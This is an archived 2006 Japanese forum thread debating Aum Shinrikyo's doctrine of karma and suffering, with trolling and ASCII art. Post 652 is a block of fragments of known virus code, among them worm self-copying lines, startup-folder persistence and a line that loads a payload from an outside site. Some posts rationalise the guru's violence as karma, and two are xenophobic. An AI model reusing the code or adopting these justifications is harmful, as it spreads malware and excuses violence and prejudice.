>逆に生き物を神様のように崇めていたりする。

そうだね。
問題なのは「過剰に何かをしてしまう」ことだと思う。
即ち、それが「貪り」であり「囚われ」なわけだけど…


605 :名無しさん@3周年:2006/08/26(土) 18:11:15 ID:sIrfT88a ?2BP(0)
>>587
「教義」(オウムのに限らず)という武器が筆頭でしょう。
「理論武装」という言葉があるように。
またその使い方によっては、「後悔の種」となることもある。
「カルマの法則」など、その典型例ですよね。
「苦の滅尽」がいつしか「責任問題」にすり替わったのでは、
いつまでも苦しみは滅尽しませんからね。

もっとも、必要な「分析」とのバランスもなかなか難しいところですが。w

606 :名無しさん@3周年:2006/08/26(土) 18:13:32 ID:0HatCiFY
>オウム以外の、例えは「チベット仏教」などでは、
「生きていくために必要な最小限度の行為」は、
「許容範囲」である、と説明されていたと思います

教祖が警察や司法機関の人間を殺そうと思ったのも
生きていくために必要な行為ではありましたね
彼らを殺さないと自分が殺されるという瀬戸際でしたから

漏れ、ミラレパに妖精だったことがあると、言われたことがある
適当か本当なのかわからないけど
しばらくしゃべっていたら、出し抜けにそう言われた


607 :阿左谷北:2006/08/26(土) 18:23:58 ID:Ccwy1cRI
>>604
そうですね。
私は身体鍛えることに執着していますが、
逆に鍛え過ぎで、土日はぐったりして寝て過ごしたりします。
これなんかは、やり過ぎなんでしょうね。

608 :和井 恵:2006/08/26(土) 19:01:29 ID:KUSX34OL
>「カルマの法則」など、その典型例ですよね。
>「苦の滅尽」がいつしか「責任問題」にすり替わったのでは、
>いつまでも苦しみは滅尽しませんからね。

うん。オウムの「カルマの法則」は、
見方(視点)を変えると「(自己の)カルマ落とし」は、
相手に「カルマを引き受けさせる」行為でもある。
だから、考え方によっては「悪業」だと言えなくもない…


609 :和井 恵:2006/08/26(土) 19:03:08 ID:KUSX34OL
>これなんかは、やり過ぎなんでしょうね。

「オーバーワーク」だね^^

610 :名無しさん@3周年:2006/08/26(土) 19:46:22 ID:sIrfT88a ?2BP(0)
>>608
もしオウムで言う「カルマの法則」が本当に正しいとしたら、
人間というか、魂そのものが決して拭い去れない「原罪」を
持ってしまっている、ということになるでしょうね。
そんな救いのない話は真っ平ごめんですので。w

611 :オウムつぶしたあとは...:2006/08/26(土) 19:48:03 ID:dQUcGQSH
オウムをつぶし、
オウムという抵抗勢力、目の前のたんこぶがとれて
売国自民党はやりたいほうだい、大暴れ!!

こんどは、庶民を戦争に、どんどん投入するのが、
次の作戦。




612 :オウムつぶしたあとは...:2006/08/26(土) 19:48:34 ID:dQUcGQSH
    三晋晋晋晋晋晋晋,
   晋晋晋晋晋晋晋晋晋晋三,
   晋晋三 '晋晋晋晋晋晋晋晋i
  晋晋晋   ' ̄ ̄三晋晋晋晋'      国民のみなさ〜ん!
  晋晋晋          三晋晋
  晋晋 I   ◆  ‖ ◆   三晋     オウムつぶしたあとは戦争ですから〜
  I晋   ◆ /)  (\◆   晋
  丶,I ◆/● I  I ●\◆ i'i    いまのうちに、体を鍛えて、
   I │  // │ │ \_ゝ │ I
   ヽ I    /│  │ヽ    I/
    │   ノ (___) ヽ  │     うでたてふせでもしておいてください!!
    │    I  ‖  I    │
     I    |_人_I    I
     i    | --- |   │
     \  /      ヽ ,/
       ヽ____ 'ノ




613 :名無しさん@3周年:2006/08/26(土) 19:53:08 ID:VliKhPvY
>>609
オーバーワークと言えば、
ネット依存症に注意!
宗教的な見解は異なるがここの常連は、
似たもの同士かもしれない。
これは自分自身に対する警告。


614 :和井 恵:2006/08/26(土) 20:40:27 ID:KUSX34OL
>オウムをつぶし、
>オウムという抵抗勢力、目の前のたんこぶがとれて

それは、「自意識過剰」。
オウムなんて、そんなに相手から「意識されていない」と思うよ…

615 :和井 恵:2006/08/26(土) 20:47:59 ID:KUSX34OL
>そんな救いのない話は真っ平ごめんですので。w

うん。
「苦(を創り出すカルマ)の 総量は一定である」という世界観は、
救われない話だな、と私も思います。


616 :名無しさん@3周年:2006/08/26(土) 20:52:52 ID:0HatCiFY
書き込み極端に減ったけど
やっぱ、個人情報抜かれたとか、そういうのが原因かね?
用心しているのかな

617 :宮下杏菜@勤務中・携帯から:2006/08/26(土) 21:17:10 ID:sCO+/GEl
〉616 だからさ、2ちゃんからは、個人情報なんかは、アーレフにかかわっている人でさえ、私が前に書いたことさえ注意してれば、抜かれるなんて、ありえないんだってば! 一般の人なら絶対に大丈夫だからね。
ところで、お客さんが居ない・・・ 女の子は皆、携帯で営業中(;^_^A 私はインターネット(^^ゞ 和井さーん、お店来てよー

618 :阿左谷北:2006/08/26(土) 21:19:17 ID:Ccwy1cRI
思い出したけど、オウムって、個人情報大好きなんだよな。
特に信者の懐具合w
あと、病気や悩み事なども。
カルマ強迫観念を植え付ける、材料になるのだろう。
おお、こわ!

619 :和井 恵:2006/08/26(土) 21:25:19 ID:KUSX34OL
>ところで、お客さんが居ない・・・

給料日後なのにね…

>和井さーん、お店来てよー

また、そのうちね^^
来月、会社の人を連れて行く予定ですwww

620 :名無しさん@3周年:2006/08/26(土) 21:28:53 ID:zH33Fnyw
>>615
苦の総量が一定で最終解脱者だけが、
苦を空性に還元できるというのは、
ありそうなことだと思う。

カルマが返ってくるという現象は、
もう何回も何回も嫌というほど、
私自身は見せつけられているし、
尊師が多くの人に苦しみを与えて、
カルマを落としていると考えると、
理論的にスッキリする。

物理学ではエネルギーの総量は一定だから、
苦の総量も一定というのはスッキリする。

621 :和井 恵:2006/08/26(土) 21:30:18 ID:KUSX34OL
>来月、会社の人を連れて行く予定ですwww

それと、又別の日に、
シャバちゃんとも行く予定を立てています^^

まぁ、来月はその二回くらいだね。


622 :和井 恵:2006/08/26(土) 21:35:05 ID:KUSX34OL
>苦の総量が一定で最終解脱者だけが、
>苦を空性に還元できるというのは、
>ありそうなことだと思う。

誰かが「苦を空性に還元できる」のならば、
「苦の総量が一定」という主張自体が破綻する。
それに、「最終解脱者だけが、苦を空性に還元できる」というのは、
どの「説法」で主張していたことなのかしら?

93年10月以降かな?



623 :阿左谷北:2006/08/26(土) 21:35:38 ID:Ccwy1cRI
宮下さんは、新宿怖くないんですか?
ヤクザの縄張りとかもあるんじゃないですか?

624 :宮下杏菜@勤務中:2006/08/26(土) 21:36:33 ID:sCO+/GEl
〉619 和井さん、本当ですかぁ\(^O^)/ やった! また、よろしく(^-^)

625 :和井 恵:2006/08/26(土) 21:36:46 ID:KUSX34OL
>物理学ではエネルギーの総量は一定だから、
>苦の総量も一定というのはスッキリする。

確かにオウムでは、「カルマの法則」というものを
「物理学的」に捉えているよね…

626 :名無しさん@3周年:2006/08/26(土) 21:43:20 ID:grYL7xXM
>>622  和井恵さん

これなんかどうでしょうか?




尊師)善悪というのも、相対的なものだということね、流れがあるんだということ。
http://pureweb.jp/~ata/text/preaching/h/kaisetsu.html
一九九三年七月十六日(明け方?) 『ナーローパの六ヨーガ』関東信徒以外編
http://pureweb.jp/~ata/text/preaching/higi/930716roku.html
一九九二年六月九日(PM8:00) 尊師特別説法会
http://pureweb.jp/~ata/text/preaching/1992/920609sen.html
一九八八年八月三十一日 尊師直弟子用説法
http://pureweb.jp/~ata/text/preaching/1988/880831j.html



627 :和井 恵:2006/08/26(土) 21:44:50 ID:KUSX34OL
>「最終解脱者だけが、苦を空性に還元できる」

これが本当に正しいのならば、
確かに「大量無差別殺人(カルマ落としのしまくり)」も正当化されるのかもね…

628 :阿左谷北:2006/08/26(土) 21:49:33 ID:Ccwy1cRI
オウムは苦を一くくりにして語るところがおかしい。
例えば、病気の苦は病院で適切な治療をすればいいわけだし、
生活苦なら、節約するとか働くとかすればいいわけだし。
オウム流のやり方では、苦は無くなるどころか、悪化するだろうね。

ダライラマも言ってたけど、頭痛なら頭痛薬を飲みなさいと。

629 :和井 恵:2006/08/26(土) 22:14:27 ID:KUSX34OL
>>626
>一九九三年七月十六日
>善悪というのも、相対的なものだということね、
>流れがあるんだということ。

つまり、「見方(捉え方)」によって、
その内容(善悪)が変化してしまうということは、
そのカルマは「心理的なモノ」であって、
「物理学的なモノではない」のではありませんか?

>小乗というのは、自分が綺麗になりたいと、自分が安定したいと、
>自分が絶対的に、つまり己利だから、単純に己利だけだから、
>利他じゃないんだよ

これは、オウムが勝手に定義付けしているモノであって、
何度も言っているように「仏教史学的」には、
「大乗」「小乗」というのは「差別用語(虚構)」です。

630 :和井 恵:2006/08/26(土) 22:15:26 ID:KUSX34OL
>そうだね。返ってきてその人の心に変化がなければどうなる? 
>単に肉体的なカルマ返しとなっちゃうね。
>で、その苦しみが変換していくね。
>つまり普通はどういうことかというと、プラーナと心が一緒に動くから、
>苦楽の総量が一定なんだね。ところが動かなければ、
>あるいは逆の瞑想ができれば、苦楽の総量を逆転させることができるね、
>どっかに(?)。わかるよね

この説法を読む限りでは、別に「最終解脱者」だけが
「苦の総量を減らせる」とは言っていないよね。
その人の「プラーナと心が一緒に動かなければ」
あるいは「逆の瞑想ができれば」可能である、と言っている。

で、一番良いのは、この説法で釈迦がやっていると言ったような、
他の人に迷惑を掛けない「自己の極限の苦行」で
苦の総量を減らすのが一番良いのでは?
釈迦は「他のカルマ」を自己に吸収するのに、
いつ「他を攻撃(カルマ落とし)」したのでしょうか?
その部分の説明が、完全に抜け落ちているよね…

一応、途中まで読んでみて、このコメントを書いてみました。
私としては、彼の説明をあまり読み続けたくないんだけど、
(理論的でないので、読み続けると頭がだんだん痛くなってくる)
もっと続けた方がいい?

631 :名無しさん@3周年:2006/08/26(土) 22:21:46 ID:yBg8LTC0
理屈じゃないんだよ。チンコなんだよ。
尊師が毎日ハードオナニーで示されて下さっているだろ?
すべてはチンコなんだよ。分かるか

632 :和井 恵:2006/08/26(土) 22:23:29 ID:KUSX34OL
>で、一番良いのは、この説法で釈迦がやっていると言ったような、
>他の人に迷惑を掛けない「自己の極限の苦行」で
>苦の総量を減らすのが一番良いのでは?

この時の釈迦の「苦行」は、確か「(最終?)解脱」する以前の行為だよね…


633 :阿左谷北:2006/08/26(土) 22:25:00 ID:Ccwy1cRI
麻原説法はハードオナニーw

634 :名無しさん@3周年:2006/08/26(土) 22:28:24 ID:0KvZOcG0

/'i;ii;ii;ii;ii;i: .: .: .し: .: .: . J: .: .\          ||:: |
'i;ii;ii;ii;ii;ii;i;:: .: . : .,ィZZ;;フ: .: . ヽエヽ       .||:: | ヒッ ヒッ ヒッ ヒッ ヒッ
'i;ii;ii;ii;ii;i;:: .: .: . ": ._;_;_;..::::: .: . /二ヾ        ||:: |
'i;ii;ii;ii;ii;ii;i : .j : . : .ィ、◎ヾ::::.:.:.(<◎ !        .||:: |  ヒッ ヒッ ヒッ ヒッ ヒッ ヒッ ヒ
'i;ii;ii;ii;ii;ii;i: .: .: . /:::::: ̄ノ :::::.:.: .\"{        ||:: |
i;ii;ii;ii;ii;ii;i: .: .: .: .: .: .-'': . /: .,,,,,_:::_,ヽ、       . ||:: |    ヒッ ヒッ ヒッ ヒッ ヒッ
i;i/⌒ヽ: .:::::::.: .J: .: .: .: . ヽ::`“::T“'::.:i      ||:: |
;:{ i: .ハ: .: .: .j: .: .: .: .: . /::::: _;;.-‐ー、 |       . ||:: |    な、なんだこのスレ、キモくてもう・・・
;:ヾ: .ー: .: .: .: .: .: .: .: .: .: /_,ィェェェァ、゙!     .||:: |
ヽi;ii;ii;i_ノ: .: .: .: .: .J: . : .`ー-┴┴┴イ       ||::|     みみみ見てられない!!
: .ヽi;i;:i: .: .::::::::.: .: .: .: .: .: ..:::`ー---' !       ||:: |

635 :名無しさん@3周年:2006/08/26(土) 22:29:01 ID:0KvZOcG0
\               |         /
  \             |        /
             / ̄ ̄ ヽ,
            /        ',      /     _/\/\/\/|_
    \    ノ//, {0}  /¨`ヽ {0} ,ミヽ    /     \           /
     \ / く l   ヽ._.ノ   ', ゝ \       <   バーカ   >
     / /⌒ リ   `ー'′   ' ⌒\ \    /          \
     (   ̄ ̄⌒          ⌒ ̄ _)    ̄|/\/\/\/ ̄
      ` ̄ ̄`ヽ           /´ ̄
           |            |  
  −−− ‐   ノ           |
          /            ノ        −−−−
         /           ∠_
  −−   |    f\      ノ     ̄`丶.
        |    |  ヽ__ノー─-- 、_   )    − _
.        |  |            /  /
         | |          ,'  /
    /  /  ノ           |   ,'    \
      /   /             |  /      \
   /_ノ /              ,ノ 〈           \
    (  〈              ヽ.__ \        \
     ヽ._>              \__)


636 :和井 恵:2006/08/26(土) 22:32:38 ID:KUSX34OL
>>634
>な、なんだこのスレ、キモくてもう・・・
>みみみ見てられない!!

その「苦」から解放される一番良い方法は、
「このスレを、見ない」ことですよ。


637 :和井 恵:2006/08/26(土) 22:34:27 ID:KUSX34OL
>>635
>バーカ

子供の頃、よく言ってたよね^^
「バカバカ言う奴がバーカ」だって…

638 :名無しさん@3周年:2006/08/26(土) 22:36:43 ID:Enz5n1ru
私は「苦を滅尽」するための一定の決まった法則は
存在しないと考えます。
例えば、苦の原因が病からくる激痛であったとする。
それを抑えるための薬もない。そうなった場合楽になるには
もはや精神をどんな風に操作しても苦はなくなりません。


639 :阿左谷北:2006/08/26(土) 22:47:33 ID:Ccwy1cRI
俺は今、夜中に騒ぐ不良外国人のたまり場と化した、
下のアパートの外人の騒音に悩まされている。

選択肢
1、我慢する。
2、直接注意しに行く。
3、後日、大家に報告する。
4、満喫に避難する。
5、引越す(経済的に無理)

マジ、きつい。。

640 :名無しさん@3周年:2006/08/26(土) 22:48:39 ID:nBn5CwQj
アレフの道場にいってごらんなさい
このような女性が受付に座っていますよ
        /::::::::::::::::::::::::::::::::::::\
       /::::::::::::::::::::::::::::::::::::::::::::::::::\
      /:::::::::::::::::::::::::::::::::::::::::::::人:::::::::::ヽ
     /:::::::::|:::::::::::::::::::::::::::::::::/  ヽ、:::::::ヽ
     |:::::::::::@ヽ-------‐‐'′    ヽ:::::::::|
    |::::::::::/                 |:::::::::|
    |:::::::::/ ̄ ̄ ̄ ̄ヽ===/ ̄ ̄ ̄ ̄ヽ|:::::::::|
   |::::::=ロ  -=・=-  |,  |  -=・=-  ロ=::::::| コンニチハ、ご修行がんばってますか?
    |::::::::/ヽ      /ノ  ヽ      /ヽ:::::::|
   |:::::/  `─── /   ` ───  丶:::|
   |:::ノ        (●_●)        |::|
   |::|           l l           |::|
   |::|       __-- ̄`´ ̄--__       |::|
   |::|        -二二二二-        |::|
   |::::\                   /::::|
   \::::::\     _- ̄ ̄ ̄-_     /::::::/
     |Ξ|~ \             / ~|Ξ|
    /::::::ヽ/|\_______/|\ /:::::::ヽ
    |::::::::::|  \         /  |::::::::::::|
   /|:::::::::::|    \      /    |::::::::::::|

641 :名無しさん@3周年:2006/08/26(土) 22:48:51 ID:zH33Fnyw
>>630
(>>620ですが、私は>>626とは別人です)
自己の中だけで苦しみを落とした場合、
例えば、竹刀で足を叩いて落とした場合、
その苦しみのカルマはいつか落ちる。
そのとき、一見苦しみの総量が減少したようにみえる。
しかし、その人は、自己の苦しみを落とした分だけ、
他を苦しめても大丈夫なカルマのキャパシティ(受容力)ができて、
いつか他を苦しめるから、
結局、苦しみの総量は一定ということではないでしょうか?


642 :名無しさん@3周年:2006/08/26(土) 22:50:17 ID:nBn5CwQj
私たちはグルに
  騙     騙  騙    騙      騙     騙       騙            騙
  騙      騙  騙   騙       騙   騙        騙     騙     騙
騙騙騙騙騙        騙騙騙騙騙     騙騙     騙騙騙騙    騙騙  騙騙騙騙騙
  騙              騙      騙騙  騙       騙騙   騙 騙.      騙
  騙 騙騙騙騙騙   騙騙騙騙騙  騙     騙       騙騙  騙  騙.      騙 騙騙騙騙騙
  騙              騙             騙   騙 騙 騙  騙     騙
  騙              騙              騙  騙  騙騙   騙     騙
  騙           騙騙騙騙騙   騙         騙. 騙 騙     騙     騙
  騙  騙騙騙騙騙 騙   騙   騙   騙       騙.. 騙 騙     騙 騙  騙  騙騙騙騙騙
  騙           騙騙          騙騙騙       騙       騙   騙



         : :::::::::::::::::::::::::::::::::::::::::::::
        Λ_Λ . . . .: : : ::: : :: ::::::::::::::::::::::::::::::
       /:彡ミ゛ヽ;)ー、 . . .: : : :::::: :::::::::::::::::::::::::::::::::
      / :::/:: ヽ、ヽ、 ::i . .::::::::
      / :::/;;:   ヽ ヽ ::l . :. :. .:: : :: :: :::::::: : ::::::::::::::::::
 ̄ ̄ ̄ (_,ノ  ̄ ̄ ̄ヽ、_ノ ̄ ̄  今日のジョウユウ

643 :名無しさん@3周年:2006/08/26(土) 22:51:53 ID:nBn5CwQj
      /\___/ヽ
     /       :::::::\
    .|          .::::|
    |  ''''''   ''''''   .:::|
    .|(●),   、(●)、::::|
     \ ,,ノ(、_, )ヽ、,,.:::::/
     /``ーニ=-'"一´\
   _/((┃))_____i |_ キュッキュッ
.. / /ヽ,,⌒) ̄ ̄ ̄ ̄ (,,ノ   \
/  /_________ヽ..  \
. ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

       /\___/ヽ
     /''''''   '''''':::::::\
    . |(●),   、(●)、.:| +
    |   ,,ノ(、_, )ヽ、,, .::::|
  .   |   `-=ニ=- ' .:::::::| +
     \  `ニニ´  .:::::/     +
     /ヽ、ニ__ ーーノ゙\_
    .| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄.|  トン
   _(,,)上祐です    (,,)_
.. /. |.他人様とは付き合いないです\
/   .|_________|   \

644 :名無しさん@3周年:2006/08/26(土) 22:53:58 ID:UgpYtQ/e
http://rira.exblog.jp/

桃源事件のハニワのブログ


645 :阿左谷北:2006/08/26(土) 22:55:06 ID:Ccwy1cRI
つくづく、日本人の素晴らしさがわかるよ。
マジで、日本に溶け込もうとせず
母国語で大声で夜中に騒ぐ外人はいらない。
地方都市でもこのありさま。

646 :yasu:2006/08/26(土) 22:56:47 ID:grYL7xXM
>>630

乙です。

「苦の総量が一定」というのは、
昔、学校で学んだ、物理か化学の法則みたいですな。

果たして、「苦の総量が一定」か?

成就者になると、「苦」を「苦」と感じなくなるはずなんですが・・・。
そうなると、
ましてや、最終解脱者とか真理勝者とか覚者にとっては、
「苦」なんて、存在しないんじゃないかしら?


647 :阿左谷北:2006/08/26(土) 23:01:53 ID:Ccwy1cRI
この騒がしい外人どもは、東南アジア系みたいだから
昔日本人が東南アジア人に日本語を強制したカルマなのか?
これはかなり苦痛だ。東南アジア人が嫌いになった。
益々北海道に住みたい。

648 :名無しさん@3周年:2006/08/26(土) 23:02:21 ID:zH33Fnyw
>>639
大家に相談するのが常識的な選択。
それでダメなら怒鳴り込む。
それで相手にナイフで刺されたら警察に届ける。
まさか殺されることはないでしょう。
またうるさくなったら怒鳴り込む。

カルマ落としの修行と考えるならば、じっと我慢。
漫画喫茶に避難はタマス、この選択は最悪。
お金を貯めてから、引越しもありですね。

649 :和井 恵:2006/08/26(土) 23:02:50 ID:KUSX34OL
>>638
>私は「苦を滅尽」するための一定の決まった法則は
>存在しないと考えます。

それも一つの「見解」だと思います。
貴方にとっては、「苦を滅尽」するための修行なんて、
有り得ない、というのが実感なのでしょうね…

>例えば、苦の原因が病からくる激痛であったとする。

あのね、本当は「痛み」は単なる「痛いモノ」でしかないの。
それが「苦しい」かどうかは別。
例えば、ちょっと特殊な例だけど「SM」というものを考えて見て下さい。
あれは「脳内」で「痛み」が「快楽」に変換されるという
「逆転現象」が起きているのです。

また、心を訓練すれば「無痛状態」にすることも可能です。
(例えば、催眠術などによっても、その状態へ導くことは可能なのです)


650 :名無しさん@3周年:2006/08/26(土) 23:02:54 ID:nBn5CwQj
大家に、(あんたの名前を出さないように頼んで)注意してもらうとか
大家は一緒のところじゃないの?

651 :名無しさん@3周年:2006/08/26(土) 23:06:16 ID:0KvZOcG0
640 :名無しさん@3周年:2006/08/26(土) 22:48:39 ID:nBn5CwQj
アレフの道場にいってごらんなさい
このような女性が受付に座っていますよ
        /::::::::::::::::::::::::::::::::::::\
       /::::::::::::::::::::::::::::::::::::::::::::::::::\
      /:::::::::::::::::::::::::::::::::::::::::::::人:::::::::::ヽ
     /:::::::::|:::::::::::::::::::::::::::::::::/  ヽ、:::::::ヽ
     |:::::::::::@ヽ-------‐‐'′    ヽ:::::::::|
    |::::::::::/                 |:::::::::|
    |:::::::::/ ̄ ̄ ̄ ̄ヽ===/ ̄ ̄ ̄ ̄ヽ|:::::::::|
   |::::::=ロ  -=・=-  |,  |  -=・=-  ロ=::::::| コンニチハ、ご修行がんばってますか?
    |::::::::/ヽ      /ノ  ヽ      /ヽ:::::::|
   |:::::/  `─── /   ` ───  丶:::|
   |:::ノ        (●_●)        |::|
   |::|           l l           |::|
   |::|       __-- ̄`´ ̄--__       |::|
   |::|        -二二二二-        |::|
   |::::\                   /::::|
   \::::::\     _- ̄ ̄ ̄-_     /::::::/
     |Ξ|~ \             / ~|Ξ|
    /::::::ヽ/|\_______/|\ /:::::::ヽ
    |::::::::::|  \         /  |::::::::::::|
   /|:::::::::::|    \      /    |::::::::::::|


キャンディは自画像が得意です

652 :名無しさん@3周年:2006/08/26(土) 23:08:03 ID:0KvZOcG0
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)

653 :名無しさん@3周年:2006/08/26(土) 23:08:46 ID:grYL7xXM
>>603

>>植物は妖精が管理しているはずだから、
>>管理している妖精が引き受けるのでしょう。

>ああ、そっか。
>植物自体は「真我」を持っていなかったんだっけ?
>しかし、そうすると、「食虫植物」というのは、
>管理している「妖精」の、心の顕れなのかしら?

たしか、説法では「妖精」の世界では「完全に不殺生戒が守られている」とありましたね。

わたしの経験からすると、そうでもないような気もしますけど。
わたしは彼らに火傷を負わされましたし。


654 :阿左谷北:2006/08/26(土) 23:09:43 ID:Ccwy1cRI
>>648>>650
ありがとうございます。
大家は同じですよ。
個人の大家から法人の所有になってから
外人が増えました。
とりあえず、大家に電話しますか。。
怒鳴り込むのは効果ありすぎでしょうけど。俺、見てくれ怖いからw
あ、今解散したみたいです。

655 :和井 恵:2006/08/26(土) 23:12:41 ID:KUSX34OL
>>641
>しかし、その人は、自己の苦しみを落とした分だけ、
>他を苦しめても大丈夫なカルマのキャパシティ(受容力)ができて、
>いつか他を苦しめるから、
>結局、苦しみの総量は一定ということではないでしょうか?

面白い考え方ですね。
しかし、ちょっと気になるのは、まず、
「最初に貯金をしておいてから、後で借金をする」
というような考え方に近いのでは、と言う気がするのですね。

そして、
>いつか他を苦しめるから、
という部分。
何故、将来それが「他を苦しめる」ことに繋がるのでしょうか?
「利他の心を持ったカルマ落とし」をするから?
逆に、相手を苦しめなければ、苦の総量は減るのでしょ?

656 :名無しさん@3周年:2006/08/26(土) 23:14:44 ID:Enz5n1ru
和井さんは苦の滅尽の一例として催眠状態を認めると。
催眠という状態を定義するならばそれはそれは潜在意識
においてまやかし、又は盲目の状態とも言えます。
意図的に苦の滅尽のため痛みを感じない状態に移行させようとするなら
まやかしも苦の滅尽の一つの方法とできますね。




657 :阿左谷北:2006/08/26(土) 23:17:08 ID:Ccwy1cRI
オウムの受け付けも、昔は20代の女性がいたものだが。
今は、おばさんなんだろうな。
でも、オウムの女性は、おばさんの方が話し易い印象があったな。
いろんな経験積んでるだろうし。

658 :名無しさん@3周年:2006/08/26(土) 23:22:23 ID:sIrfT88a ?2BP(0)
>>638
単純な話、痛みを単なる痛みとしか認識しなければ、
いくら痛くても、「苦」とはならないと思います。
例えば、痛みを例に、どういうのが「苦」かといえば、
「痛んで欲しくないのに痛んでいる。いやだ!」とか、
「いつまで痛み続けるのか不安でたまらない。いやだ!」とか、
「もっと痛みがひどくなるんじゃないか。いやだ!」とか、
いわば、共通点に「いやだ!」というのが入っていることです。

もし、「あ、痛んでるな。でもそのうち治まるだろう。」
という風に考えて、「いやだ!」と思わなければ、
それは「苦しんでいる」とはもはやいえません。
結局「苦」とは、何らかの現象や感覚に対して、
不快な心の有り様で接している状態を指しているのですから。
だから、「いやだ!」がなければ「苦」とは定義できないのです。

659 :名無しさん@3周年:2006/08/26(土) 23:23:19 ID:grYL7xXM
>>657

南青山総本部道場にいたヴァジラシァーキニーさん(現:師)とかね。


あの頃はみんな若かった。


上祐氏も、TVで「若気の至りだ」とか言っていたような。


660 :名無しさん@3周年:2006/08/26(土) 23:26:41 ID:sIrfT88a ?2BP(0)
>>656
それは揚げ足取りというものでしょう。(それ以下か)
催眠でも一見同じ状態は作れる、と
和井さんは言っておられると思うのですが。
それが「苦の滅尽」そのものとは言ってないでしょう?

661 :名無しさん@3周年:2006/08/26(土) 23:28:22 ID:Enz5n1ru
全ての事象には必ず因果関係が存在します。
物事は全て過去から未来の方向へ流れます。
あえて苦をなくす為の絶対的な方法があるとすれば
苦の原因を理解、認識し、その解決策を見出し実行して対処するというのが
上げられます。
苦の発生した因は必ず捉えることが可能です。
もちろん苦に限らず全ての発生しうる感情の状態というのは。

とはいえ私はわがままでw叶えたいと思ったことは実現しないと
気がすまず執着を少し取って苦を減らすというやり方は
個人的にはですが好みませんww。






662 :阿左谷北:2006/08/26(土) 23:32:53 ID:Ccwy1cRI
>>959
俺はヴァジラ・シャーキニーさんには思い出がある。
彼女はいい人だった。少なくとも10年前は。今も現役なんですね。
言葉は、少ししか交わしていなかったけど
優しい人だった。他の女性の師は怖いのが多いのに。

663 :名無しさん@3周年:2006/08/26(土) 23:33:36 ID:zH33Fnyw
>>653
あなたは妖精が見えるのですか?

664 :名無しさん@3周年:2006/08/26(土) 23:35:15 ID:grYL7xXM


\               |         /
  \             |        /
             / ̄ ̄ ヽ,
            /        ',      /     _/\/\/\/|_
    \    ノ//, {0}  /¨`ヽ {0} ,ミヽ    /     \           /
     \ / く l   ヽ._.ノ   ', ゝ \       <   尊師っ   >
     / /⌒ リ   `ー'′   ' ⌒\ \    /          \
     (   ̄ ̄⌒          ⌒ ̄ _)    ̄|/\/\/\/ ̄
      ` ̄ ̄`ヽ           /´ ̄
           |            |  
  −−− ‐   ノ           |
          /            ノ        −−−−
         /           ∠_
  −−   |    f\      ノ     ̄`丶.
        |    |  ヽ__ノー─-- 、_   )    − _
.        |  |            /  /
         | |          ,'  /
    /  /  ノ           |   ,'    \
      /   /             |  /      \
   /_ノ /              ,ノ 〈           \
    (  〈              ヽ.__ \        \
     ヽ._>              \__)



665 :名無しさん@3周年:2006/08/26(土) 23:36:03 ID:Enz5n1ru
>>660
私が言いたいのは盲目になることにより苦を滅尽する
方法もあると言いたいだけですよ。
これは死の選択が一種の苦を滅尽する手段の一つと
定義できるとも言えるんです。

例えばあなたはいやだ!」がなければ「苦」とは定義できないと
仰るがそういう転換を万人が実行できるかは分かりません。
一種の理想論ではありますが。




666 :和井 恵:2006/08/26(土) 23:36:54 ID:KUSX34OL
>和井さんは苦の滅尽の一例として催眠状態を認めると。

いいえ、「痛み=苦しみ」かどうか、と言う問題についての
考えを述べただけで、「催眠状態=苦の滅尽」だなどという
主張をしているわけではありません。

ただ、現代的な「他力的な心の訓練」の
進め方の「技法」の一つとして考えた場合、
「催眠術」の活用は「あり」だと思っています。

一例を挙げれば、「前世療法」という
臨床心理学における「心理療法」があります。
これはある意味、仏教の「宿明智」と同じような働きを持つ、
と私は現在考えています。
単に「過去世(と思われる)」の記憶を思い出す、というのではなく、
それがその人の持つ「トラウマ(心理的な悪しき囚われ)」からの
「解放(解脱)」をさせてくれるからです。

667 :名無しさん@3周年:2006/08/26(土) 23:37:44 ID:grYL7xXM
>>663


いいえ、そこまでの能力はありません。
夢に彼らが出てきたり、気配を感じる程度です。




668 :名無しさん@3周年:2006/08/26(土) 23:43:09 ID:grYL7xXM



/'i;ii;ii;ii;ii;i: .: .: .し: .: .: . J: .: .\          ||:: |
'i;ii;ii;ii;ii;ii;i;:: .: . : .,ィZZ;;フ: .: . ヽエヽ       .||:: | ヒッ ヒッ ヒッ ヒッ ヒッ
'i;ii;ii;ii;ii;i;:: .: .: . ": ._;_;_;..::::: .: . /二ヾ        ||:: |
'i;ii;ii;ii;ii;ii;i : .j : . : .ィ、◎ヾ::::.:.:.(<◎ !        .||:: |  ヒッ ヒッ ヒッ ヒッ ヒッ ヒッ ヒ
'i;ii;ii;ii;ii;ii;i: .: .: . /:::::: ̄ノ :::::.:.: .\"{        ||:: |
i;ii;ii;ii;ii;ii;i: .: .: .: .: .: .-'': . /: .,,,,,_:::_,ヽ、       . ||:: |    ヒッ ヒッ ヒッ ヒッ ヒッ
i;i/⌒ヽ: .:::::::.: .J: .: .: .: . ヽ::`“::T“'::.:i      ||:: |
;:{ i: .ハ: .: .: .j: .: .: .: .: . /::::: _;;.-‐ー、 |       . ||:: |    な、なんだこのスレ、難しすぎてもう・・・
;:ヾ: .ー: .: .: .: .: .: .: .: .: .: /_,ィェェェァ、゙!     .||:: |
ヽi;ii;ii;i_ノ: .: .: .: .: .J: . : .`ー-┴┴┴イ       ||::|     わわわ分からない!!
: .ヽi;i;:i: .: .::::::::.: .: .: .: .: .: ..:::`ー---' !       ||:: |



